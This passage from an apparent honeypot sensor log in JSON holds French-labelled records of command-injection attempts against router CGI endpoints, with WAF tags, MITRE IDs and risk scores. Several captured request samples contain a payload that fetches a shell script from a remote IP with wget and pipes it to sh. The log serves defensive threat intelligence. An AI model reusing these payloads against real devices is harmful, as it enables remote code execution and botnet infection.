\u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":320},{"id":11809381,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54760,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/internet.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00220629d7057c54a343dd0d4f93345dc6e243865841\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 325, \u0022payload_entropy\u0022: 5.167263287944604, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c646f31985be564f8ea585a35c4a8c6b8894c061\u0022, \u0022event_fingerprint\u0022: \u00228cd5fd61861a1ceb358f7447298e7d7ed1dcfd24\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00221a34c7f363176110ba5d7aeb165b12b6\u0022, \u0022path_pattern_hash\u0022: \u002279c2d1d58dcaacc68cc00d1bea04f739\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\ngateway=192.168.1.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr2;busybox wget http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\ngateway=192.168.1.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr2;busybox wget http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002228b063a410e269fa4224b32c872d916b1750d315\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/internet.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/internet.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":325},{"id":11809382,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54772,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/adm.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00227981228fb9061b584c46dcd5df6396237d7cf2ae\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 330, \u0022payload_entropy\u0022: 5.2219656818241145, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c646f31985be564f8ea585a35c4a8c6b8894c061\u0022, \u0022event_fingerprint\u0022: \u00221cf9ee5d25b09b4a5b6db26f71bbd7d6f82ffdcb\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022ff862c07343ed05fddf053994e1d3b88\u0022, \u0022path_pattern_hash\u0022: \u00224861580e8d67a9feec8ee9a93d4f87e4\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConnection: close\\r\\n\\r\\nreboot_enabled=1\u0026reboot_time=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr3;busybox wget http:\/\/91.92.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConnection: close\\r\\n\\r\\nreboot_enabled=1\u0026reboot_time=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr3;busybox wget http:\/\/91.92.\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221c3407bb71bd40c6bc6e2870253571ca145924bb\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/adm.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, 